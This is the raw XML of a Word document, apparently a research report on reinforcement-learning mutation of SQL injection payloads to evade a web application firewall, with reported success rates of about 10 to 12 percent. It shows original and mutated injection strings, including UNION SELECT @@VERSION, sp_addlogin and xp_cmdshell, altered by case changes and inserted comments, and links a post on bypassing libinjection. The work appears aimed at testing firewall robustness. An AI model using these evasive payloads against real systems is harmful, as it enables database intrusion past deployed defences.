    <w:p w14:paraId="2355ADCA" w14:textId="28F8E4F8" w:rsidR="00DB0ED5" w:rsidRDefault="00DB0ED5" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F74B59D" w14:textId="77777777" w:rsidR="00DB0ED5" w:rsidRDefault="00DB0ED5" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35184E23" w14:textId="1EE2DB44" w:rsidR="008130DF" w:rsidRDefault="008130DF" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00837C73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Created 129 malicious payload</w:t>
      </w:r>
      <w:r w:rsidR="00DB0ED5" w:rsidRPr="00837C73">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> mutations from 1000 SQL injection examples</w:t>
      </w:r>
      <w:r w:rsidR="007D5296">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (in 10 mutation steps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBE5119" w14:textId="77777777" w:rsidR="00837C73" w:rsidRPr="00837C73" w:rsidRDefault="00837C73" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74042E5A" w14:textId="6802025C" w:rsidR="008130DF" w:rsidRDefault="00837C73" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054224E4" w14:textId="77777777" w:rsidR="00AD289D" w:rsidRDefault="008130DF" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Original</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0ED5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7A163D" w14:textId="42D1CA13" w:rsidR="008130DF" w:rsidRPr="00DB0ED5" w:rsidRDefault="008130DF" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB0ED5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>" select * from users where id = '1' union select +\,@@VERSION -- 1'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4410AF6D" w14:textId="77777777" w:rsidR="00AD289D" w:rsidRDefault="008130DF" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Mutated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB3E239" w14:textId="558E02DD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 xml:space="preserve"> " SElEcT        *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FA8A28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FROm uSERS wHeRe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40931EA3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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670B2196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=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3114778C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'1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793AF997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UNIon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66861DD9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sELect +\,@@VeRSION --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423401BF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1'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB02886" w14:textId="77777777" w:rsidR="008130DF" w:rsidRPr="008130DF" w:rsidRDefault="008130DF" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6B23F0" w14:textId="77777777" w:rsidR="00AD289D" w:rsidRDefault="008130DF" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Original</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0ED5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5376B2AE" w14:textId="4F26CBF4" w:rsidR="008130DF" w:rsidRPr="00DB0ED5" w:rsidRDefault="008130DF" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB0ED5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>"exec sp_addlogin 'name' , 'password'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F02518A" w14:textId="77777777" w:rsidR="00AD289D" w:rsidRDefault="008130DF" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Mutated</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0ED5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB19DF2" w14:textId="0F4E6EEE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"EXEc sP_aDDLOgin 'NAMe' , 'PasSwOrD'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3805137F" w14:textId="77777777" w:rsidR="008130DF" w:rsidRPr="008130DF" w:rsidRDefault="008130DF" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DE367D0" w14:textId="77777777" w:rsidR="00AD289D" w:rsidRDefault="009D233B" w:rsidP="009D233B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Original</w:t>
      </w:r>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A241E56" w14:textId="26FEF400" w:rsidR="009D233B" w:rsidRPr="009D233B" w:rsidRDefault="009D233B" w:rsidP="009D233B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>" or 1 = 1 or """" = "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E579D4" w14:textId="77777777" w:rsidR="00AD289D" w:rsidRDefault="009D233B" w:rsidP="009D233B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Mutated</w:t>
      </w:r>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ACACE6" w14:textId="381258CD" w:rsidR="009D233B" w:rsidRPr="009D233B" w:rsidRDefault="009D233B" w:rsidP="009D233B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>" OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1971BD5D" w14:textId="77777777" w:rsidR="009D233B" w:rsidRPr="009D233B" w:rsidRDefault="009D233B" w:rsidP="009D233B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>1/*%sxV5Kunr?*/= 1 OR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7A490A" w14:textId="7C8C9830" w:rsidR="009D233B" w:rsidRPr="009D233B" w:rsidRDefault="009D233B" w:rsidP="009D233B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>"""" =  "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B75989" w14:textId="77777777" w:rsidR="009D233B" w:rsidRPr="009D233B" w:rsidRDefault="009D233B" w:rsidP="009D233B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="405835BE" w14:textId="77777777" w:rsidR="00AD289D" w:rsidRDefault="009D233B" w:rsidP="009D233B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Original</w:t>
      </w:r>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D50DD92" w14:textId="287F8D30" w:rsidR="009D233B" w:rsidRPr="009D233B" w:rsidRDefault="009D233B" w:rsidP="009D233B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>'; exec master..xp_cmdshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482754D5" w14:textId="77777777" w:rsidR="00AD289D" w:rsidRDefault="009D233B" w:rsidP="009D233B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD289D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Mutated</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD289D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C9CD06" w14:textId="1312828F" w:rsidR="008130DF" w:rsidRPr="00AD289D" w:rsidRDefault="009D233B" w:rsidP="009D233B">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD289D">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>'; ExEc MaSTER..xP_CMDsHeLl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CB2983" w14:textId="77777777" w:rsidR="008130DF" w:rsidRPr="008130DF" w:rsidRDefault="008130DF" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22044143" w14:textId="77777777" w:rsidR="008130DF" w:rsidRPr="008130DF" w:rsidRDefault="008130DF" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A596813" w14:textId="77777777" w:rsidR="00AD289D" w:rsidRDefault="008130DF" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Original</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0ED5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1848636F" w14:textId="27EE41A7" w:rsidR="008130DF" w:rsidRPr="00DB0ED5" w:rsidRDefault="008130DF" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB0ED5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>" select * from users where id = '1' or \.&lt;1 union select 1,@@VERSION -- 1'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7314C536" w14:textId="77777777" w:rsidR="00AD289D" w:rsidRDefault="008130DF" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D233B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>Mutated</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0ED5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3240B966" w14:textId="52FA9AE3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" SElEcT *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781550FF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FROm uSERS wHeRe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D149C2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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0792E2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=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599AC829" w14:textId="77777777" w:rsidR="008130DF" w:rsidRPr="00DB0ED5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'1' OR  \.&lt;1 Union sElecT 1,@@vERSiOn --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCCFA79" w14:textId="6CF29D21" w:rsidR="008130DF" w:rsidRDefault="008130DF" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB0ED5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>1'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3282FC51" w14:textId="661676AE" w:rsidR="009D233B" w:rsidRDefault="009D233B" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D3E774" w14:textId="0A62F262" w:rsidR="009D233B" w:rsidRDefault="009D233B" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10F957A5" w14:textId="48A417B4" w:rsidR="009D233B" w:rsidRDefault="009D233B" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A2E2829" w14:textId="487E7A24" w:rsidR="009D233B" w:rsidRPr="004D51DA" w:rsidRDefault="004D51DA" w:rsidP="008130DF">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D51DA">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Interesting blog post how to break Libinjection firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7B49D8" w14:textId="3506D2F2" w:rsidR="00C05653" w:rsidRDefault="00651982" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidR="00C05653">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>How to bypass libinjection in many WAF/NGWAF | by Ivan Novikov | Medium</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="61D74F2D" w14:textId="1C055335" w:rsidR="00437AB9" w:rsidRDefault="00437AB9" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1355D446" w14:textId="5EBD47DC" w:rsidR="00437AB9" w:rsidRDefault="00437AB9" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E7AB93C" w14:textId="00028DDC" w:rsidR="007D5296" w:rsidRDefault="007D5296">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="664527EB" w14:textId="2F56FF36" w:rsidR="00C614BF" w:rsidRPr="00662074" w:rsidRDefault="00C614BF" w:rsidP="00662074">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662074">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Extending action space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37898B04" w14:textId="77777777" w:rsidR="004D51DA" w:rsidRPr="004D51DA" w:rsidRDefault="004D51DA" w:rsidP="004D51DA"/>
    <w:p w14:paraId="1114E0E9" w14:textId="75BC0034" w:rsidR="00C614BF" w:rsidRDefault="00C614BF" w:rsidP="004D51DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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split 3 actions to 6 to reduce the randomness </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4860B810" w14:textId="2C574868" w:rsidR="00C614BF" w:rsidRPr="00C614BF" w:rsidRDefault="001247C6" w:rsidP="004D51DA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph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(examples can be found in waf_brain_test_actions.py)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13413D1C" w14:textId="77777777" w:rsidR="00C614BF" w:rsidRDefault="00C614BF" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D08CF57" w14:textId="06194A3A" w:rsidR="00437AB9" w:rsidRPr="00662074" w:rsidRDefault="002A0291" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00662074">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Extend</w:t>
      </w:r>
      <w:r w:rsidR="00C614BF" w:rsidRPr="00662074">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r w:rsidRPr="00662074">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> action space</w:t>
      </w:r>
      <w:r w:rsidR="004E6408" w:rsidRPr="00662074">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> – 10 steps per episode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B468C56" w14:textId="491B4CE7" w:rsidR="002A0291" w:rsidRDefault="00662074" w:rsidP="0090183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~ 12% success rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E11D794" w14:textId="24839667" w:rsidR="002A0291" w:rsidRPr="002A0291" w:rsidRDefault="002A0291" w:rsidP="00901833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6988A5E" wp14:editId="39419237">
            <wp:extent cx="5731510" cy="1315085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C76F" w14:textId="30E475EF" w:rsidR="00437AB9" w:rsidRDefault="00437AB9" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="478D0ED1" w14:textId="77777777" w:rsidR="004818F9" w:rsidRDefault="004818F9" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CF6E5D0" w14:textId="77777777" w:rsidR="004E6408" w:rsidRDefault="004E6408" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB2F49B" w14:textId="630A26CC" w:rsidR="002A0291" w:rsidRDefault="004E6408" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Extended action space – 30 steps per episode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177F4378" w14:textId="78608F66" w:rsidR="00E15A3F" w:rsidRDefault="00E15A3F" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>~10% success rate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574C5EC9" w14:textId="424B05BE" w:rsidR="002A0291" w:rsidRPr="00C16477" w:rsidRDefault="002A0291" w:rsidP="00901833">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0291">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53282A9B" wp14:editId="21333856">
            <wp:extent cx="5731510" cy="1335405"/>
            <wp:effectExtent l="0" t="0" r="254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291" w:rsidRPr="00C1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172B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3D8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44A87"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE921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55391"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F1C0300"/>
    <w:lvl w:ilvl="0" w:tplc="C00E77C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9265B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C3F8B4C2"/>
    <w:lvl w:ilvl="0" w:tplc="7DFA4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477"/>
    <w:rsid w:val="000161F1"/>
    <w:rsid w:val="00027FC0"/>
    <w:rsid w:val="000573A2"/>
    <w:rsid w:val="000958A5"/>
    <w:rsid w:val="00101AAD"/>
    <w:rsid w:val="001247C6"/>
    <w:rsid w:val="00134642"/>
    <w:rsid w:val="001C5BE5"/>
    <w:rsid w:val="0027551D"/>
    <w:rsid w:val="00285568"/>
    <w:rsid w:val="0028623C"/>
    <w:rsid w:val="002A0291"/>
    <w:rsid w:val="00395385"/>
    <w:rsid w:val="003A3B8E"/>
    <w:rsid w:val="00437AB9"/>
    <w:rsid w:val="004818F9"/>
    <w:rsid w:val="00497FAE"/>
    <w:rsid w:val="004A04B2"/>
    <w:rsid w:val="004C054F"/>
    <w:rsid w:val="004D51DA"/>
    <w:rsid w:val="004D625A"/>
    <w:rsid w:val="004E6408"/>
    <w:rsid w:val="004E70E4"/>
    <w:rsid w:val="004F5E98"/>
    <w:rsid w:val="0051555F"/>
    <w:rsid w:val="00552EA2"/>
    <w:rsid w:val="005E17A0"/>
    <w:rsid w:val="006277E8"/>
    <w:rsid w:val="00651982"/>
    <w:rsid w:val="00662074"/>
    <w:rsid w:val="0077411F"/>
    <w:rsid w:val="007A75A2"/>
    <w:rsid w:val="007D5296"/>
    <w:rsid w:val="008130DF"/>
    <w:rsid w:val="0083348A"/>
    <w:rsid w:val="00837C73"/>
    <w:rsid w:val="00856442"/>
    <w:rsid w:val="008748AC"/>
    <w:rsid w:val="008A3CFA"/>
    <w:rsid w:val="008E4088"/>
    <w:rsid w:val="008F4AF3"/>
    <w:rsid w:val="00901833"/>
    <w:rsid w:val="009D233B"/>
    <w:rsid w:val="00A06C9B"/>
    <w:rsid w:val="00AB389A"/>
    <w:rsid w:val="00AC6DCD"/>
    <w:rsid w:val="00AD289D"/>
    <w:rsid w:val="00AD4FAA"/>
    <w:rsid w:val="00AD5987"/>
